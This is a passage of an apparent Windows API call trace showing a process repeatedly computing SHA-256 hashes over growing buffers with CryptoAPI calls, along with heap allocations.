	[0239.592] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.592] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.592] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.592] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.592] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0239.592] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.592] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c03a0
	[0239.592] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c03a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c03a0, pdwDataLen=0x128ba4) returned 1
	[0239.592] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.592] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.592] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.593] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.593] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0239.593] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.593] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0418
	[0239.593] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0418, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0418, pdwDataLen=0x128ba4) returned 1
	[0239.593] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.593] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.593] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.593] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.593] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0239.593] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.593] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0288
	[0239.593] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0288, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0288, pdwDataLen=0x128ba4) returned 1
	[0239.593] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.594] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.594] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.594] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.594] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0239.594] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c02b0
	[0239.594] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c02b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c02b0, pdwDataLen=0x128ba4) returned 1
	[0239.594] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.594] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.594] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.594] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.595] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0239.595] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c02d8
	[0239.595] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c02d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c02d8, pdwDataLen=0x128ba4) returned 1
	[0239.595] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.595] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.595] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.595] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.595] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0239.595] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bef28
	[0239.595] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bef28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bef28, pdwDataLen=0x128ba4) returned 1
	[0239.595] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.595] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.595] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.596] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.596] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0239.596] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27beed8
	[0239.596] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27beed8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27beed8, pdwDataLen=0x128ba4) returned 1
	[0239.596] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.596] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.596] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.596] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.596] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0239.596] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bef00
	[0239.596] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bef00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bef00, pdwDataLen=0x128ba4) returned 1
	[0239.596] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.596] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.596] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.597] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.597] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0239.597] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.597] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf018
	[0239.597] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf018, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf018, pdwDataLen=0x128ba4) returned 1
	[0239.597] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.597] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.597] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.597] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.597] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0239.597] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf040
	[0239.598] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf040, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf040, pdwDataLen=0x128ba4) returned 1
	[0239.598] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.598] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.598] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.598] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.598] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0239.598] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf068
	[0239.598] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf068, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf068, pdwDataLen=0x128ba4) returned 1
	[0239.598] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.598] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.598] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.599] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.599] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0239.599] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf090
	[0239.599] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf090, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf090, pdwDataLen=0x128ba4) returned 1
	[0239.599] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.599] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.599] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.599] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.599] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0239.599] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf0b8
	[0239.599] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf0b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf0b8, pdwDataLen=0x128ba4) returned 1
	[0239.599] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.599] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.600] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.600] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.600] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0239.600] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.600] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf0e0
	[0239.600] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bf0e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf0e0, pdwDataLen=0x128ba4) returned 1
	[0239.600] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.600] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.600] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.600] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.600] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0239.601] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.601] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bed20
	[0239.601] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bed20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bed20, pdwDataLen=0x128ba4) returned 1
	[0239.601] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.601] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.601] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.601] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.601] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0239.601] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.601] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bee38
	[0239.601] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bee38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bee38, pdwDataLen=0x128ba4) returned 1
	[0239.601] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.601] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.601] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.602] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.602] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0239.602] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bed48
	[0239.602] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bed48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bed48, pdwDataLen=0x128ba4) returned 1
	[0239.602] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.602] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.602] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.602] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.602] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0239.602] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bed70
	[0239.603] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bed70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bed70, pdwDataLen=0x128ba4) returned 1
	[0239.603] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.603] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.603] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.603] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.603] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0239.603] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.603] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bed98
	[0239.603] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bed98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bed98, pdwDataLen=0x128ba4) returned 1
	[0239.603] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.603] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.603] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.604] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.604] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0239.604] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bedc0
	[0239.604] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bedc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bedc0, pdwDataLen=0x128ba4) returned 1
	[0239.604] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.604] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.604] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.604] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.604] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0239.604] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bede8
	[0239.604] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bede8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bede8, pdwDataLen=0x128ba4) returned 1
	[0239.604] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.604] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.604] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.605] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.605] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0239.605] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bee10
	[0239.605] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27bee10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bee10, pdwDataLen=0x128ba4) returned 1
	[0239.605] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.605] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.605] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.605] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.605] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0239.605] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c09b8
	[0239.605] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c09b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c09b8, pdwDataLen=0x128ba4) returned 1
	[0239.605] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.605] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.605] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.606] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.606] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0239.606] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c09e0
	[0239.606] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c09e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c09e0, pdwDataLen=0x128ba4) returned 1
	[0239.606] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.606] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.606] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.606] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.606] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0239.606] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0a08
	[0239.606] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0a08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0a08, pdwDataLen=0x128ba4) returned 1
	[0239.607] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.607] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
